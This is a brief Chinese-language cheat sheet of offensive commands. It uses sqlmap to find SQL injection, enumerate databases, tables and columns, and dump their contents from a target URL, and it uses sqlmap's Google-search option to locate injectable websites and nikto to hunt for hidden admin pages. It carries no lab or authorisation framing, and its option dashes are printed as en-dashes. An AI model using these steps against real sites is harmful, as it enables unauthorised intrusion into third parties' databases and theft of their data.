1. 扫描漏洞:sqlmap -u 网址 –dbs –current-user
  2. 拆表名:sqlmap -u 网址 –tables
  3. 拆列:sqlmap -u 网址 -T 表名 –columns
  4. 获取列的字段:sqlmap -u 网址 -T 表名 -C 列名,若多个列用, 分隔 –dump
  5. 利用谷歌找可sql 注入的网站:sqlmap -g 搜索指令
  6. 用nikto 扫描隐藏文件来找管理页面:nikto -host 网址
    或者查看网页源码,看有没有什么发现。